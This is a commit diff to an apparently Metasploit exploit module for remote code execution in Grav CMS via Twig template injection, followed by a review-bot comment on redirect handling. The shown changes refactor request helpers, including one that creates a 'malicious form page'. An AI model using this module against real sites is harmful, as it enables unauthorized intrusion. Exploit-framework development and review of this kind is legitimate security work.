
Commit a20e2df

committed
Use send_request_cgi! for automatic redirect handling
1 parent 028aa2f commit a20e2df


1 file changed

+2
-16
lines changed


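--- a/modules/exploits/multi/http/grav_twig_ssti_sandbox_bypass_rce.rb
+++ b/modules/exploits/multi/http/grav_twig_ssti_sandbox_bypass_rce.rb
@@ -166,16 +166,13 @@ def get_version_after_login
 end
 
 def authenticate
-res = send_request_cgi(
+res = send_request_cgi!(
 'method' => 'GET',
 'uri' => normalize_uri(target_uri.path, 'admin'),
 'keep_cookies' => true
 )
 return :connection_failed unless res
 
-res = follow_redirect(res)
-return :connection_failed unless res
-
 html = res.get_html_document
 return :connection_failed unless html
 
@@ -237,7 +234,7 @@ def fetch_admin_nonce
 
 def create_form_page
 print_status('Creating malicious form page...')
-res = send_request_cgi(
+res = send_request_cgi!(
 'method' => 'POST',
 'uri' => normalize_uri(target_uri.path, 'admin', 'pages'),
 'keep_cookies' => true,
@@ -254,7 +251,6 @@ def create_form_page
 )
 fail_with(Failure::Unreachable, 'Connection failed') unless res
 
-res = follow_redirect(res)
 html = res.get_html_document
 fail_with(Failure::UnexpectedReply, 'Could not parse form page') unless html
 
@@ -370,14 +366,4 @@ def compress_deflate(data)
 deflater.close
 compressed
 end
-
-def follow_redirect(res)
-return res unless [301, 302, 303].include?(res.code)
-
-send_request_cgi(
-'method' => 'GET',
-'uri' => res.headers['Location'],
-'keep_cookies' => true
-)
-end
 end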
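Review bot: In `create_form_page` the redirected request is no longer guaranteed to be a `GET`: the removed `follow_redirect` always issued `'method' => 'GET'` to the `Location`, while `send_request_cgi!` (not shown on this page) appears to re-issue the request with the original options, so a redirect after the `POST` to `admin/pages` may re-send the form body rather than fetch the resulting page. The helper also seems to follow a `Location` that names another host, which would send the request outside the configured target and should be ruled out before the response is parsed. If either holds, keep `send_request_cgi(` for the POST and follow with an explicit same-host `GET`; otherwise add a comment such as `# send_request_cgi! follows one redirect by default and reuses these opts`. The same applies less sharply to `authenticate`, where the original request is already a `GET`; both method bodies continue outside the hunks.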
